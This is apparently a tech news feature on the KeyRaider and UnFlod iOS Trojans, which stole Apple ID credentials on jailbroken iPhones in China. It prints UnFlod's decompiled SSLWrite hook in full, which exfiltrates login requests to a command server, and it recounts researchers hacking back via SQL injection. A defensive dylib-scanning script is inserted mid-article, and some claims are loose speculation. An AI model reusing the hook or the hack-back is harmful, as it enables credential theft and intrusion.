Chinese third-party app stores are presenting the same headache to Apple that they do to Google

Late last week a group of Chinese iOS enthusiasts and Palo Alto Networks Inc. (PANW) shared an alarming revelation.  Over 225,000 jailbroken Apple, Inc. (AAPL) iPhones -- mostly in China -- have been infected via a new family of Trojans dubbed "KeyRaider".  And far from a hypothetical threat, the report went on to state that over 20,000 users appear to be actively exploiting credentials stolen by the malware to get "free" iTunes apps, books, videos, and music on the victims' dime.

I. The Chinese Connection

For some this news may come as a surprise.  Once, the iPhone was a sales laggard in China, and hardly a high profile attack target in the region.  But that picture has shifted dramatically over the past few years.  The iPhone is big in China.  Wait, scratch big -- HUGE in China.  Since 2014, China has been driving Apple's growth largely via iPhone uptake, boosting the Cupertino company to massive profits even as some of its star products, like the iPad tablet, slid in sales.

It seems that Chinese buyers can't get enough of the iPhone, which has become a status symbol of sorts among China's increasingly affluent professional ranks.  But for all the financial upside, China is ultimately proving a double-edged sword for Apple in terms of security.

China iPhone
The Chinese government in Beijing allegedly targeted Apple with cyberattacks this week. [Image Source: VR-Zone]

The world's largest smartphone market since 2011, China has a monthly active population of 370 million app users at last count.  But in the age of mobility, many in the world's biggest mobile market are falling back on their nation's old ways, seeking out free software by stripping away the security on their devices.

Apple's arch-rival Google, Inc. (GOOG) knows this story all too well.  Since surpassing Symbian in 2010-2012, Google's Android has been labeled by many journalists and security experts as not only the world's top mobile platform, but the least secure mobile platform as well.  Indeed, while scattered stories of attacks on jailbroken iOS devices were occasionally reported as far back as 2009, experts agreed that the bulk of successful malware at the time was targeting Android.

Android malware
[Image Source: Android Authority]

But there was a caveat.  While Android's short-lived support for Adobe Systems, Inc.'s (ADBE) oft-vulnerable Flash rich media platform or "fragmentation" were often blamed for attacks on Android, the reality was that in the U.S., Europe, Australia, Canada, and other developed markets, Android's malware affliction was largely nonexistent.  Most of the reports of mass infections of hundreds of thousands of Android users originated in China and similar markets with an abundance of rooted devices and shady third-party app stores.  It could be said that Android's dominance in China to some extent gave it an undeservedly bad name in terms of security.

And now there's big trouble in not-so-little China for Apple, as well.  

II. Malware Cometh

Since July, the researchers at Palo Alto Networks and their Chinese partners have been analyzing KeyRaider's behavior and digging into its code and distribution network, hunting for clues to its origin.  What they found is both intriguing and alarming: a picture of cunning, malice, and betrayal in iOS's wild east.

The newly discovered "KeyRaider" family of iOS-specific malware may be the worst of its kind, but it assuredly isn't the first.  In order to understand KeyRaider, it's perhaps best to begin with the story of Unflod and AppBuyer, two highly similar malware examples.

Apple ID
There's been a rise in malware looking to steal your Apple ID over the past year and a half. [Image Source: iMore]

Unflod (aka SSLCreds or Unflod Baby Panda) was the first major credential-theft malware to be discovered on iOS.  Apparently taking hold during the iPhone 5S's reign, Unflod was a fairly short piece of code, with fewer than 100 lines of instructions when decompiled.  It lurks in the "MobileSubstrate" collection of iOS dynamic libraries (*.dylib) on jailbroken iOS devices -- an approach that would later be used by AppBuyer and KeyRaider.

Unflod samples bore a signature that indicated they were compiled in Feb. 2014.  Just two months after its apparent compilation it was discovered and discussed by Reddit users, and later profiled by Germany's SektionEins GmbH.  As the Redditors and SektionEins state, Unflod appeared to originate in China and is believed to have been largely distributed by third-party iOS app stores, specifically certain app stores based on Cydia repositories.

Cydia app store
[Image Source: MayPalo]

The irony is not lost that redditor Jay "saurik" Freeman was among the first to discover this growing new class of Trojan malware threats.  Freeman is the owner of SaurikIT and developer of Cydia.  Initially launched in early 2008 for the original iPhone, Cydia was among the first underground iOS app stores, and ultimately it has proven the longest lived.  When it was founded, Apple wasn't allowing third-party apps.  But the launch of the iPhone 3G, and third-party apps with it, did not kill Cydia as some anticipated.

In the years since, Cydia has morphed into a lucrative moneymaker, reselling developers' paid content for jailbroken devices.  Saurik has alliances with many in the jailbreak community, and Cydia is preinstalled by default as a part of many iOS jailbreaking programs.  A 2011 report by The Washington Post suggests that the network fetches Freeman in excess of a quarter million dollars a year and that SaurikIT pulls in a cool $10M USD annually.  At the time Cydia had 4.5 million users weekly.

But it was Freeman's decision to share the wealth and freely license Cydia's framework under GPLv3 to others looking to start third-party app stores that has truly cemented its influence in the jailbreaking community.  

But since the discovery of Unflod, saurik has seen third-party adopters of the Cydia framework increasingly playing host to user content that transforms the popular content platform into a malicious attack platform.

UnFlod was deceptively simple.  It hooked Apple's SSLWrite function, so that when the user attempted to authenticate using their Apple ID and password, the credentials passed through the hook before encryption could protect them.  The SSL imposter function -- UnFlod -- would copy the user's data off to remote command and control servers and then pass the request along to the real SSLWrite.

UnFlod's single function, "replace_SSLWrite", in its entirety (decompiler output; braces restored and comments added for readability):
int __fastcall replace_SSLWrite(int a1, char *a2, int a3, int a4)
{
  int v4; // r3@11
  int v5; // ST28_4@14
  size_t v6; // ST24_4@14
  int v7; // ST10_4@18
  size_t v8; // ST0C_4@18
  struct sockaddr v10; // [sp+40h] [bp-60h]@16
  ssize_t v11; // [sp+50h] [bp-50h]@14
  int v12; // [sp+54h] [bp-4Ch]@14
  struct sockaddr v13; // [sp+58h] [bp-48h]@12
  ssize_t v14; // [sp+68h] [bp-38h]@10
  int v15; // [sp+6Ch] [bp-34h]@10
  char *v16; // [sp+70h] [bp-30h]@7
  char *v17; // [sp+74h] [bp-2Ch]@5
  char *v18; // [sp+78h] [bp-28h]@5
  char *v19; // [sp+7Ch] [bp-24h]@2
  int v20; // [sp+80h] [bp-20h]@1
  int v21; // [sp+84h] [bp-1Ch]@1
  char *v22; // [sp+88h] [bp-18h]@1
  int v23; // [sp+8Ch] [bp-14h]@1
  int v24; // [sp+90h] [bp-10h]@11
  int v25; // [sp+94h] [bp-Ch]@1

  v25 = __stack_chk_guard;
  v23 = a1;   // SSL context
  v22 = a2;   // plaintext buffer about to be encrypted by SSLWrite
  v21 = a3;
  v20 = a4;
  // State 0: wait for the iTunes Store authentication request header to pass through.
  if ( !findhead )
  {
    v19 = strstr(v22, "/WebObjects/MZFinance.woa/wa/authenticate HTTP/1.1");
    if ( v19 )
    {
      findhead = 1;
      strcpy(content, v22);   // start accumulating the request into a global buffer
    }
  }
  // State 1: header seen; wait for the plist body carrying the Apple ID and password.
  if ( findhead == 1 )
  {
    v18 = strstr(v22, "<key>appleId</key>");
    v17 = strstr(v22, "<key>password</key>");
    if ( v18 )
    {
      if ( v17 )
      {
        strcat(content, v22);
        v16 = strstr(content, "</plist>");
        if ( v16 && v16 - content <= 2040 )
          v16[8] = 0;          // cut the buffer right after "</plist>"
        v14 = 0;
        v15 = socket(2, 1, 0); // AF_INET, SOCK_STREAM
        if ( v15 < 0 )
        {
          v24 = pSSLWrite(v23, v22, v21, v20);
          goto LABEL_20;
        }
        v13.sa_family = 2;                              // AF_INET
        *(_WORD *)&v13.sa_data[0] = 0xC61Eu;            // port in network byte order (0x1EC6 = 7878)
        *(_DWORD *)&v13.sa_data[2] = inet_addr("");     // C&C address, redacted in the published listing
        if ( connect(v15, &v13, 0x10u) < 0 )
        {
          v24 = pSSLWrite(v23, v22, v21, v20);
          goto LABEL_20;
        }
        v5 = v15;
        v6 = strlen(content);
        v14 = write(v5, content, v6);   // first copy of the plaintext request leaves the device
        v11 = 0;
        v12 = socket(2, 1, 0);
        if ( v12 < 0 )
        {
          v24 = pSSLWrite(v23, v22, v21, v20);
          goto LABEL_20;
        }
        v10.sa_family = 2;
        *(_WORD *)&v10.sa_data[0] = 0xC61Eu;
        *(_DWORD *)&v10.sa_data[2] = inet_addr("");
        if ( connect(v12, &v10, 0x10u) < 0 )
        {
          v24 = pSSLWrite(v23, v22, v21, v20);
          goto LABEL_20;
        }
        v7 = v12;
        v8 = strlen(content);
        v11 = write(v7, content, v8);   // second, identical upload
        findhead = 2;                   // done: never capture again on this device
      }
    }
  }
  // Every path ends by forwarding to the real SSLWrite, so the login still succeeds.
  v24 = pSSLWrite(v23, v22, v21, v20);
LABEL_20:
  if ( __stack_chk_guard != v25 )
    __stack_chk_fail(__stack_chk_guard, v24, v25, v4);
  return v24;
}

Evil as it may have been, UnFlod did bear a certain elegance in its brevity.  It is still unclear precisely how many users were infected or whether the stolen credentials were abused.  Given the timing, one must wonder if the breach might have been tied to some of "the fappening" leaks of celebrity private photos/videos/content (which would corroborate Apple's claims that the leaks weren't the result of a separate breach affecting iCloud and the "Find My iPhone" tool).  We may never know exactly what damage was done by UnFlod.

III. Apps Don't Grow on Trees

From an even broader perspective, AppBuyer -- and KeyRaider -- belong to a growing collection of malware families that share a common goal: credential theft.  

The security community is pushing back and looking to raise public awareness before it's too late.  Over the past couple of years Palo Alto Networks' Unit 42 has cultivated a fruitful set of partnerships with amateur hackers/developers in China, including the iOS-centric WeipTech (Weiphone Tech Team).


With the help of these local guns, Palo Alto Networks has crowdsourced the work of malware profiling and tracing.  This tactic has proved crucial in tracking the rise of credential-stealing malware.  Its prominent recent discoveries in this space include:
  • AppBuyer (aka "AdThief")
    • Discovered: May 2014 (preliminary) ; Sept. 2014 (official report)
    • Platform Targeted: iOS
    • Number Infected: 75,000+
    • Remote C&C (command & control) Capability?  Yes.
    • Kind: Trojan (malicious Cydia tweak)
    • Behavior: Steals iTunes credentials
  • Lurker (aka "WireLurker")
    • Discovered: Nov. 2014
    • Platform Targeted: iOS/OS X (incl. non-jailbroken devices)
    • Number Infected: 350,000+ (OS X stage; iOS stage: ??)
    • Remote C&C (command & control) Capability?  Yes.
    • Kind: Trojan that becomes a local worm
    • Behavior: Lurks in OS X waiting to infect connected iOS devices to steal user data

KeyRaider continues in the line of AppBuyer.  While more ambitious, it's also done a poorer job covering its tracks, if the discoverers' report proves accurate.

The malware first flew onto the radar in July when complaints reached amateur WeiTech researcher "i_82", a college student at Yangzhou University by day and white hat hacker by night.  The reports hit close to home.  WeiTech is affiliated with one of China's largest and most active iOS enthusiast communities, Weiphone.  And as it turns out, Weiphone's Cydia repositories have reportedly been unwittingly serving as KeyRaider's home base.

The KeyRaider saga appears to be a tale of betrayal, as at least one prominent community member at Weiphone has been implicated in possibly being one of the malware's chief distributors.

The story is unique in the sense that unlike UnFlod and last year's AppBuyer/AdThief, this time around the security researchers have traced the malware in gory detail.  In fact the evidence is so damning that one might wonder if the apparent culprits were being framed by savvier hackers or foreign nation state hackers like the National Security Agency (NSA) or the U.S. Central Intelligence Agency (CIA) (both of which have been implicated in attacking Apple users in the past).

But while history has taught us that Occam's razor does not always apply in today's era of strange espionage and deceit, sometimes the truth really is the most obvious one, so let us assume that the picture painted by Palo Alto Networks is reality incarnate.

Under that premise the story of KeyRaider begins with its behavior.  Like UnFlod, KeyRaider's core bits hide as dynamic libraries in iOS's "MobileSubstrate" directory tree.  The key clue to their existence is the malware's attempts to contact the attacker's command and control servers.

IV. Traitors in the Ranks?

Distribution-wise KeyRaider is a Trojan.  In some cases it is reportedly stored in ambiguous third-party packages, but more typically it appears to be bundled in counterfeited copies of well known apps or in so-called "Cydia Tweaks".  Cydia Tweaks are bundled customizations (scripts, etc.) for Cydia-enabled jailbroken devices.  Traditionally they've been a powerful tool for jailbreakers to make useful modifications to their iOS devices.


But given that so many jailbroken devices have exposed root access or other gaping holes, Tweaks are increasingly being viewed by hackers as a cheap ticket to serious device compromises.

Interestingly the malware disables local and remote unlocking by hooking the apsd daemon in iOS and capturing the credentials used for push notifications, plus the GUID.  The motivation for this unusual strategy remains unknown at present.  It does, however, speak to the malware's sophistication, as the code is tampering with previously undocumented internal iOS functionality pertaining to unlocking.

The Trojan's other tactics appear more straightforward.

The malware is continuously active, scanning the system memory for signs of an authentication attempt -- specifically instances of "itunesstored", the process Apple uses for internal authentication messaging to the App Store.  

The Hook: iTunes Store hook [Image Source: PAN/WeiTech]

When it witnesses an attempt, the App Store purchasing information is intercepted and logged by the man-in-the-middle, a fake SSLWrite.  Presumably the snooper then completes the authentication attempt to maintain its guise of innocent operation.


The Catch [Image Source: PAN/WeiTech]

Upon the call to SSLRead, the program extracts (and clears) the logged cache value, which contains the Apple account username, password, and in some cases the device GUID.  It encrypts this info with a fixed AES key (which would prove a key clue to the malware's apparent origin).


Bringing Home the Bounty [Image Source: PAN/WeiTech]

The malicious code maintains active command and control links both to ferry its encrypted stolen contents to the attackers and, reportedly, to allow for modifications in the future that could make it more dangerous.  In fact, some users reported receiving threats tied to KeyRaider (one even sent a picture, which is posted on Palo Alto Networks' blog), which may indicate it has upgraded itself to include ransomware capabilities or is perhaps pulling partner malware packages into the fray.  Alternatively this connection may prove coincidental.  But it's certainly an option on KeyRaider's radar.

Ultimately it is the encrypted traffic where the onion of a mystery began to peel back under WeiTech and Unit 42's probing.  It was apparent the malware was transmitting to a specific IP -- which, importantly, remained active.  WeiTech conducted a bit of a counterattack, using SQL injection to hack the hackers, then dumping their database of stolen credentials.  The primary table "aid" contained 225,941 total entries.  The contents could be confirmed thanks to a portion of the entries that were not encrypted.

Hack Back [Image Source: PAN/WeiTech]

While the Palo Alto Networks blog does not mention it, I believe this may be tied to the use of the stolen credentials by the client apps.  Those apps have been downloaded approximately 20,000 times, the researchers note.  Perhaps the authors decrypted the credentials for use by their end users out of laziness, not wanting to have to handle encryption on both ends.

The big breakthrough, though, came when i_82 recovered the AES key by decompiling one of the attack apps.  The key was "mischa07"...


[Image Source: PAN/WeiTech]

... and lo and behold, a user matching that name was not only on WeiPhone, but had 15 Tweaks and apps containing the code in their repository.  Further indicating their role as the mastermind, the same user is promoting a pair of client apps, iappstore and iappinbuy, which tap the stolen user credentials.



[Image Source: PAN/WeiTech]

Ironically, the damage appears to have been limited by user skepticism that these apps would work.  The iappstore app obtains a stolen credential which is stored locally and uses it to pay for paid app purchases.  It was only downloaded 62 times, reportedly.  The second app, iappinbuy, used the stolen credentials to purchase in-app items.  That app was downloaded nearly 20,200 times and appears to be where most of KeyRaider's damage has been done.

iTunes -- China
WeiPhone users largely were suspicious of the client apps being pranks and didn't take advantage of them, limiting the damage. The client apps allowed users to download items from China's iTunes portal (pictured) on the victim's dime. [Image Source: M.I.C. Gadget]

Bamu's role was found by analyzing the upload messages, which carry a flag in addition to the stolen credentials.  In the case of mischa07's Trojans, the value is the name of the app.  By contrast, other uploads carried the name "bamu", hinting at some sort of kickback arrangement.  Bamu's apps appear to have stolen about two-thirds of the credentials lifted via the mass infection.

While there's a faint possibility that their support was somehow unwitting and accidental, it appears that "bamu", a top Weiphone community contributor, may have helped to balloon the breach. While the user has a reputation for providing tools to the community, they may have parlayed that trust into a harsh betrayal of their fellow Weiphoners.  In total, 77 Tweaks and apps in bamu's repository appear to contain the dark passenger.  Popular app titles that bamu allegedly tainted with KeyRaider include iFile, iCleanPro, and avfun.

V. Some International Exposure is Observed

In terms of impact, in addition to the 225,941 stolen App Store credentials, the researchers found in total 5,841 entries of private keys and certificates used for push notifications.  It's possible the smaller quantity is due to this feature only recently being added.  There was also a list of 3,000 iTunes receipts, likely stored for analysis purposes after successful calls from the client apps.

Additionally a total of 92 KeyRaider variants -- Trojans containing the core malicious payload -- were found in the wild.

In addition to the client apps not taking off, another lucky turn is that the malicious apps don't appear particularly hard to remove from jailbroken iPhones.  Basically the key is just to delete the malicious dynamic libraries.  Of course, if you find the signature on your device, you'll assuredly want to change your Apple ID password and activate two-factor authentication as well.
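As an added example (not code from the Palo Alto Networks/WeipTech report), here is a small indicator scanner for the MobileSubstrate dynamic-library directory of a jailbroken device, keyed on the strings this article documents: the MZFinance authenticate endpoint and plist keys from the UnFlod hook above, the SSLWrite/SSLRead hook targets, and the hard-coded AES key "mischa07".  The /Library/MobileSubstrate/DynamicLibraries path, the indicator weights and the sample dylib contents are assumptions constructed for the demo.

```python
"""Indicator scanner for MobileSubstrate dylibs on a jailbroken iOS device.

Added example, not from the report.  Flags .dylib files containing the strings
the article ties to UnFlod/KeyRaider-style credential theft.  Directory path,
weights and sample contents are assumptions made for this demo.
"""
import os
import tempfile
from typing import Dict, List, Tuple

# Indicator strings taken from the article (decompiled UnFlod hook and the
# KeyRaider analysis).  Weights are illustrative; a file scoring >= THRESHOLD
# is reported.  A single short string such as "SSLWrite" is not enough on its own.
INDICATORS = {
    b"/WebObjects/MZFinance.woa/wa/authenticate": 3,  # iTunes Store login endpoint
    b"<key>appleId</key>": 2,                          # plist key for the Apple ID
    b"<key>password</key>": 2,                         # plist key for the password
    b"SSLWrite": 1,                                    # hook target used by UnFlod/KeyRaider
    b"SSLRead": 1,                                     # hook target used by KeyRaider
    b"mischa07": 4,                                    # fixed AES key recovered by i_82
}
THRESHOLD = 4

# Assumed default location of MobileSubstrate tweaks on a jailbroken device.
DYLIB_DIR = "/Library/MobileSubstrate/DynamicLibraries"


def score_blob(data: bytes) -> Tuple[int, List[str]]:
    """Return (score, matched indicators) for the raw bytes of one file."""
    score = 0
    hits: List[str] = []
    for needle, weight in INDICATORS.items():
        if needle in data:
            score += weight
            hits.append(needle.decode())
    return score, hits


def scan_directory(path: str) -> Dict[str, List[str]]:
    """Scan every *.dylib under `path`; return {filename: matched indicators}
    for files that reach THRESHOLD.  Reading is binary, so Mach-O headers and
    embedded strings are handled alike."""
    flagged: Dict[str, List[str]] = {}
    for name in sorted(os.listdir(path)):
        if not name.endswith(".dylib"):
            continue
        with open(os.path.join(path, name), "rb") as fh:
            score, hits = score_blob(fh.read())
        if score >= THRESHOLD:
            flagged[name] = hits
    return flagged


def build_demo_dir() -> str:
    """Create a temp directory with constructed dylib stand-ins:
    one benign tweak, one UnFlod-like hook, one KeyRaider-like tweak."""
    d = tempfile.mkdtemp(prefix="dylibs_")
    samples = {
        # benign: unrelated strings only (constructed)
        "ClockTweak.dylib": b"\xcf\xfa\xed\xfe SpringBoard _hookClock 12:00",
        # UnFlod-like: endpoint, plist keys and the SSLWrite hook target (constructed)
        "Unflod.dylib": (b"\xcf\xfa\xed\xfe SSLWrite "
                         b"/WebObjects/MZFinance.woa/wa/authenticate HTTP/1.1 "
                         b"<key>appleId</key> <key>password</key>"),
        # KeyRaider-like: hook targets plus the hard-coded AES key (constructed)
        "iFile_patched.dylib": b"\xcf\xfa\xed\xfe itunesstored SSLRead SSLWrite mischa07",
    }
    for name, content in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(content)
    return d


if __name__ == "__main__":
    # Scan the real tweak directory when run on a jailbroken device, else the demo set.
    target = DYLIB_DIR if os.path.isdir(DYLIB_DIR) else build_demo_dir()
    for name, hits in scan_directory(target).items():
        print(f"SUSPICIOUS {name}: {', '.join(hits)}")
```

The matcher only catches the unobfuscated strings the article documents, so treat a clean result as weak evidence and a hit as a prompt to remove the dylib and rotate the Apple ID password as described above.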

As with past attacks, the vast majority of the victims are isolated to the home ground of the associated third-party app store (namely, China).  Unit 42 writes that "over half" of the email addresses in the database were from Tencent subscribers.  Among the other top 10 email domains, most were Chinese...
... while a couple were associated with America's top tech firms:
  • (Apple)
  • (Apple)
Additionally, other emails indicated users from other countries may have been exposed.  These include:
  • tw: Taiwan
  • fr: France
  • ru: Russia
  • jp: Japan
  • uk: United Kingdom
  • ca: Canada
  • de: Germany
  • au: Australia
  • us: United States
  • cz: Czech Republic
  • il: Israel
  • it: Italy
  • nl: Netherlands
  • es: Spain
  • vn: Vietnam
  • pl: Poland
  • sg: Singapore
  • kr: South Korea
The list showcases the damaging domino effect that China's lax security can have.  Many of these regions, such as Canada, Australia, the United Kingdom, Germany, France, and Italy, traditionally have seen extremely few mobile attacks.

In China WeiTech has posted the information in an advisory with Wooyun, a crowdsourced threat advisory platform.  They also posted about the malware on their Weibo account.  Palo Alto Networks and WeiTech have also passed along the warning to CNCERT/CC, China's governmental threat tracking body.

VI. Rude Awakening

In case the hack of its developer hub two years back wasn't sign enough, the recent spate of attacks should be a wakeup call to Apple.  The likes of KeyRaider, AppBuyer, and WireLurker are on the prowl, infecting five-figure or near-five-figure user populations in the wild on iOS.  Even the Chinese government is recognizing that iOS can be every bit as much a security risk as Android, when abused.

For years Apple has devoted most of its energy into fighting jailbreaking which it has repeatedly insisted is inherently "illegal".  Granted, if it were possible to stop, these kinds of mass outbreaks might be made practically extinct.  But Apple would be wise to face the writing on the wall: the battle against the jailbreakers has been fought and lost.

It's no secret that Apple's security has long been lacking in some regards on iOS.  Many glaring security flaws in iOS were reported over the years.  One blunt analysis concluded that Apple was ten years behind Microsoft Corp. (MSFT) in terms of security.  It has only been due to a mix of good fortune and a lack of commercial payoff, owing to the smaller userbase size, that Apple has largely avoided any sort of effective attack against its iOS customers.

There is growing concern related to the US government's digital efforts to compromise encryption. [Image Source: Gizmodo]

The same could be said for some time about OS X, but that situation was the first to shift.   Today OS X Trojans are a relatively common occurrence -- including in the U.S.  In the face of pathological denial on Apple's part, hundreds of thousands of Macs have been infected at times.  That has ultimately forced Apple to admit OS X has some security concerns.  While it has stopped short of offering them free protection, even Apple now warns OS X users to use antivirus software.

Apple's need to better secure iOS is pressing, as it is deeply dependent on China and cannot afford to overlook the security impact that its growing, unruly userbase there may have on the broader global iOS customer base.  

Aside from the American market, China is Apple's most crucial foreign market.  In the quarter ending in June, it accounted for $13B USD in sales, most of which came from iPhone sales and sales of iPhone-related content.  Even in its slowest quarter, Apple managed to sell approximately 12.5 million iPhones in the region [source].  (Which is why China's recent currency woes have hit oh so hard.)

Apple has also prided itself as a content curator -- the master of its walled garden.  Thus many may believe that with so many iPhone users in China -- the land of software piracy and honey (but mostly the former) -- Apple has at long last become the first to slay the Chinese piracy dragon.

Well, not so much.

VII. iOS Jailbreaks Remain Abundant, Dangerous in China

It turns out that the same dirty little problem that's plaguing third-party Android app stores -- piracy-friendly third-party app stores -- is bugging Apple as well.  To give credit where credit is due (depending on your perspective on DRM), there are somewhat fewer jailbroken iOS devices in China than rooted Android devices, their equivalent.  This could be due to any number of factors, but is likely tied somewhat to Apple's higher ASP (average sales price), which likely attracts a more affluent crowd capable of paying for content.

That's not to say that all jailbreakers and rooters are scurvy pirates.  Some remove device restrictions for customizability or research.  Even among the pirate crowd such secondary motivations are more common in China than in many regions, in part because many foreign devices and iOS lack access to certain local app markets and aren't as well regionalized as people would like.  

iOS 9
Many Chinese users feel that the default localized keyboard in iOS is inferior to the Pinyin fast-type keyboard from Chinese software giant Baidu Inc. (ETR:B1C).

M.I.C. Gadget, a Chinese tech blog, highlights some of the issues with iOS 9 to this end writing:

There are two main reasons why Chinese people desperately need jailbreaking for their iPhone and iPad. First, the laggy Apple App Store. The connection in China is stupidly slow; probably there's no dedicated server for China. It could take more than 10 minutes to get a simple app like FlipBoard or Facebook downloaded. Those apps with size over 100 MB are really a painful experience. If you want to subscribe to some magazine on Newsstand, it takes ages to download one issue. Local third-party iOS App Stores such as PP Assistant and 91 Assistant consequently become the best option for Chinese iOS users, which are fast and convenient, and of course you need to jailbreak your iOS devices first in order to use them.

Next, we come to the Chinese input method. iOS's default input method for Chinese is rather difficult to use. The size of the screen has limited the speed of typing Chinese characters using the QWERTY keyboard. The new iPhone 5 does not provide a bigger screen with a wider width; it just became longer, which doesn't improve the convenience of Chinese input. Switching between Chinese and English is user-unfriendly, and the Chinese vocabulary is also very limited. Jailbreaking the iOS device allows Chinese users to install their familiar input software made by Chinese internet companies. Those localized Pinyin inputs let users type at least 2 times faster, thanks to more accurate predictive phrases. And don't forget about the old-school T9 input method, which was applied to mobile phones in the early days; it's still widely used by many Chinese phone users. The rapidity and efficiency of the T9 keyboard is very good for inputting Chinese Pinyin.

Of course, that's not meant as a knock against Apple, alone.  

Chinese customers have similar complaints about many of the non-local Android smartphone makers.  In fact, while iTunes may not work well in China, as of last year Google Play officially wasn't supported at all in China (although many were still able to access it by spoofing their location codes).  And thus, for a mixture of pirate urges and practicality, many in China choose to remove the restrictions on their device -- with or without permission from the device maker.

Android rooting rates aren't as high as some might guess.  According to an Aug. 2014 survey by Chinese telecom Tencent Holdings Ltd. (HKG:0700), 27.44 percent of Chinese Android smartphone users root their phones (roughly 1 in 4).  At one time Apple jailbreak rates in China were even higher -- as high as 35 percent (1 in 3 users).  In 2013, as sales picked up, those rates fell sharply to around 12 percent.  But they've been creeping up very slowly ever since, hitting 13.6 percent in Sept. 2014 [source] -- roughly 1 in 8 customers.

Chinese customers' proclivity for rooting Androids and using them with unsecured third-party app stores helped make Android the most malware-ridden platform in 2013, according to Finnish security firm F-Secure.

Interestingly, China is far from the most attacked country when it comes to non-mobile threats.  According to a report by Kaspersky, while over 50 percent of attacks appeared to originate from China...

China malware

...China wasn't even in the top ten in receiving non-mobile attacks.  It ranked 16th:

Rank  Country  % of unique users attacked
1 Russia 38.98%
2 Kazakhstan 37.70%
3 Ukraine 35.75%
4 Syria 34.36%
5 Belarus 33.02%
6 Azerbaijan 32.16%
7 Thailand 31.56%
8 Georgia 31.44%
9 Moldova 31.09%
10 Vietnam 30.83%
11 Armenia 30.19%
12 Kyrgyzstan 29.32%
13 Croatia 29.16%
14 Algeria 28.85%
15 Qatar 28.47%
16 China 27.70%
17 Mongolia 27.27%
18 Macedonia 26.67%
19 Bosnia and Herzegovina 25.86%
20 Greece 25.78%
But when it comes to mobile threats China is the world's most dangerous place to be a smartphone user:

Rank  Country  % of users attacked
1 China 16.34%
2 Malaysia 12.65%
3 Nigeria 11.48%
4 Bangladesh 10.89%
5 Tanzania 9.66%
6 Algeria 9.33%
7 Uzbekistan 8.56%
8 Russia 8.51%
9 Ukraine 8.39%
10 Belarus 8.05%
Part of this, of course, is because China is also the world's biggest smartphone market.  But it also owes a lot to the fact that approximately 1 in 4 Android smartphone owners and 1 in 8 iPhone owners have rooted or jailbroken their device.

In both malware threats...

Kaspersky -- mobile malware

... the red dragon is cherry red on Kaspersky's charts, indicating the highest percentage of users experiencing these kinds of attacks.  And while it's largely avoided the particularly insidious "banking malware" subcategory of mobile malware...

Kaspersky -- banking mobile malware

...China is seeing a growing number of threats in that space as well.

And increasingly the Chinese customer is being targeted by maturing families of malware.  In Q1 2015, for example, roughly three in every five mobile malware packages were new. In Q2, interestingly, while new mobile malware packages soared nearly 3-fold over Q1, the percentage of new packages versus existing ones dipped sharply to just under 20 percent.  This indicates that four in five malware packages seen in Q2 were already known in prior quarters.

Mobile malware packages

And it's not just malware (which typically seeks privilege escalation and device takeover).  There are many related malicious software categories (scareware, ransomware, adware, etc.) that are also on the rise in the mobile space.

mobile malware
Mobile malware by category -- Q2 2015 -- Kaspersky Lab

It is clear that after years of blowing off mobile malware as an "Android issue", China, app piracy, and the correlated abundance of mobile malware are now industry-wide issues.

China and Apple may eventually see their relationship wane under the pressure of new stresses.
[Image Source: CNN]

Traditionally Apple has taken a fearful, adversarial stance towards even the most pro-Apple of hackers searching for threats on its platform.  There are anecdotal signs that's changing, such as jailbreaker Comex's internship stint.  While that liaison admittedly ended in bizarre fashion, with Apple firing him for not replying to an email, the fact that he was brought in in the first place suggests Apple is acknowledging the need for cooperation with the hacker community.

VIII. It Could be Worse

Such change is likely to be chaotic, but is inevitable.  The world of security is complex and no longer fits into Apple's former black and white views towards security researchers.  Further evidence of this is observed in other prominent recent hires, including top former Windows hacker Kristin Paget (formerly Chris Paget).

In terms of results, Apple still faces fewer attacks by the numbers and is doing a better job at wiping its customers' devices than some Android OEMs.  It's also shored up its encryption in the past few iOS releases.

It's a hard knock life for Apple as it finds itself the target of a multitude of hacking interests ranging from the U.S. and Chinese governments to the plethora of citizen hackers in China, Russia, and Eastern Europe.  

CoolPad installs backdoors on its users' devices?  Cheer up Apple fans, it could be worse... [Image Source: Google Images]

But Apple users can at least be thankful their favorite OEM isn't purposefully sabotaging users' devices like the "CoolReaper" backdoor that the Coolpad Group Ltd. (HKG:2369) -- China's third largest smartphone maker and the world's sixth place phonemaker overall -- was caught using.  Apparently it truly could get worse.

Source: Palo Alto Networks [blog]
